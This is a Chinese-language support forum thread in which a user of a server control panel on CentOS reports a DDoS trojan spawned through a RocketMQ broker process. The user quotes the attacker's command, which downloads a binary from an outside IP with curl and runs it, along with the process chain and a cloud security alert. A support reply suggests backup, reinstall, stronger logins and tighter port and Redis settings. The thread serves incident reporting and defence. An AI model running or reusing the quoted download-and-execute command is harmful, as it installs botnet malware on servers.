【已解答】木马攻击

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：免费版 7.9.0

系统版本：CentOS  7.6 64位

问题描述：

创建恶意进程，kill  paraiso相关进程后，就会在opt目录生成 paraiso1.x86

1. 用户名 root
   
2. 命令行  sh -c $@|sh . echo cd /opt/; curl -O http://152.70.143.251/bins/paraiso.x86; chmod 777 paraiso.x86; ./paraiso.x86 china;/bin/startfsrv.sh -n localhost:9876
   
3. 进程ID 15545
   
4. 父进程ID 8988
   
5. 进程链
   
6. -[8955]  sh mqbroker -n localhost:9876 autoCreateTopicEnable=true
   
7.     -[8959]  sh /usr/local/rocketmq-4.9.3/bin/runbroker.sh org.apache.rocketmq.broker.BrokerStartup -n localhost:9876 autoCreateTopicEnable=true
   
8.         -[8988]  /bin/java -server -Xms256m -Xmx256m -Xmn128m -XX:+UseG1GC -XX:G1HeapRegixss=16m -XX:G1ReservePercent=25 -XX:InitiatingHeapOccupancyPercent=30 -XX:SoftRefLRUPolicyMSPerMB=0 -verbose:gc -Xloggc:/dev/shm/rmq_srv_gc_%p_%t.log -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCApplicationStoppedTime -XX:+PrintAdaptiveSizePolicy -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=30m -XX:-OmitStackTraceInFastThrow -XX:+AlwaysPreTouch -XX:MaxDirectMemorySize=15g -XX:-UseLargePages -XX:-UseBiasedLocking -cp .:/usr/local/rocketmq-4.9.3/bin/../conf:/usr/local/rocketmq-4.9.3/bin/../lib/*: org.apache.rocketmq.broker.BrokerStartup -n localhost:9876 autoCreateTopicEnable=true

复制代码

1. {
   
2.     "Status": "new",
   
3.     "InstanceName": "xxxxxxxx",
   
4.     "ResourceId": "xxxxxxxx",
   
5.     "Content": {
   
6.         "internet_ip": "1xxxxxxxx2",
   
7.         "op": "new",
   
8.         "instance_id": "i-xxxxxxxx",
   
9.         "level": "serious",
   
10.         "unique_info": "62af021c0f8f619dd19c2130dc5f0273",
    
11.         "last_time": 1686296315785,
    
12.         "event_name_display": "DDOS木马",
    
13.         "event_type_display": "恶意软件-DDoS木马",
    
14.         "machine_name": "laxxxxxxxx2",
    
15.         "intranet_ip": "17xxxxx4",
    
16.         "uuid": "32628079-e29d-424c-8723-a4e6f875573e",
    
17.         "status": 1
    
18.     },
    
19.     "Product": "sas",
    
20.     "Time": 1686296325000,
    
21.     "Level": "CRITICAL",
    
22.     "RegionId": "cn-hangzhou",
    
23.     "GroupId": "0",
    
24.     "Name": "Suspicious:MaliciousProcess:serious"
    
25. }

复制代码

相关截图（日志、错误）：

您好，这个进程您检查下服务器内是否存在这个攻击木马，这个进程非面板内生成的。按照您提供的信息这个应该是一个可控制服务器作为一个肉鸡的向外发送攻击的，建议做好数据备份重新安装系统，尽量使用复杂度高的密码、密钥方式登录服务器
其次不必要的端口尽量开放，如使用到Redis服务，如果需要对外公网访问，建议您指定IP去访问。设置好redis密码